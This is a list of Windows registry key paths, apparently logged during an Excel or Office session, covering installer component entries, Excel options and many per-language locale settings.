HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DAC2F939EC01C57459C7E63331E5811F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BEDE53AF72BC15F4DB5B0A54F74BE2F4
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BEDE53AF72BC15F4DB5B0A54F74BE2F4\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F30310DBE8910274AAB7564DFA731AD2
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F30310DBE8910274AAB7564DFA731AD2\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0D5E46558D61E624FBD49F580C60AAAD
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0D5E46558D61E624FBD49F580C60AAAD\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B817069A20A723644ABD77B5904BA680
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B817069A20A723644ABD77B5904BA680\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FD9DBA6C1A1DBA34F9A96AE000B36C9B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FD9DBA6C1A1DBA34F9A96AE000B36C9B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6CFF80B23458D1A4F9423CBA598F08ED
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6CFF80B23458D1A4F9423CBA598F08ED\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\54446A4E4C59A3F43ABF5DA35AA67E85
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\54446A4E4C59A3F43ABF5DA35AA67E85\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D17369B4AAC587B4E968E0BF0771D07F
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D17369B4AAC587B4E968E0BF0771D07F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Usage\EXCELFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-SA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-SA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bg
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bg
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bg-BG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bg-BG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ca
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ca
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ca-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ca-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zh-Hans
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zh-Hans
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zh-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zh-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\cs
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\cs
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\cs-CZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\cs-CZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\da
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\da
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\da-DK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\da-DK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\el
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\el
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\el-GR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\el-GR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fi-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fi-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\he
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\he
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\he-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\he-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hu-HU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hu-HU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\is
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\is
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\is-IS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\is-IS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ja
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ja
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ja-JP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ja-JP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ko
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ko
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ko-KR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ko-KR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nl-NL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nl-NL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\no
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\no
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nb-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nb-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\pl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\pl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\pl-PL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\pl-PL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\pt
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\pt
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\pt-BR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\pt-BR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\rm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\rm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\rm-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\rm-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ro
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ro
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ro-RO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ro-RO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ru
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ru
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ru-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ru-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hr-HR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hr-HR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sk-SK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sk-SK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sq
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sq
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sq-AL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sq-AL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sv
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sv
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sv-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sv-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\th
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\th
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\th-TH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\th-TH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tr-TR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tr-TR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ur
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ur
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ur-PK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ur-PK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\id
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\id
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\id-ID
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\id-ID
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\uk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\uk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\uk-UA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\uk-UA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\be
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\be
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\be-BY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\be-BY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sl-SI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sl-SI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\et
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\et
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\et-EE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\et-EE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\lv
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\lv
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\lv-LV
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\lv-LV
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\lt
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\lt
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\lt-LT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\lt-LT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tg
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tg
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tg-Cyrl-TJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tg-Cyrl-TJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fa-IR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fa-IR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\vi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\vi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\vi-VN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\vi-VN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hy-AM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hy-AM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\az
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\az
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\az-Latn-AZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\az-Latn-AZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\eu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\eu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\eu-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\eu-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hsb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hsb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hsb-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hsb-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mk-MK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mk-MK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tn-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tn-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\xh
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\xh
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\xh-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\xh-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zu-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zu-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\af
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\af
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\af-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\af-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ka
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ka
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ka-GE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ka-GE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fo-FO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fo-FO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hi-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hi-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mt
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mt
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mt-MT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mt-MT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\se
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\se
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\se-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\se-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ga
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ga
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ga-IE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ga-IE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ms
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ms
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ms-MY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ms-MY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\kk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\kk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\kk-KZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\kk-KZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ky
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ky
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ky-KG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ky-KG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sw
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sw
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sw-KE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sw-KE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tk-TM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tk-TM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\uz
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\uz
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\uz-Latn-UZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\uz-Latn-UZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tt
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tt
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tt-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tt-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bn-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bn-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\pa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\pa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\pa-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\pa-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\gu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\gu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\gu-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\gu-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\or
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\or
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\or-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\or-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ta
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ta
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ta-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ta-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\te
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\te
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\te-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\te-IN
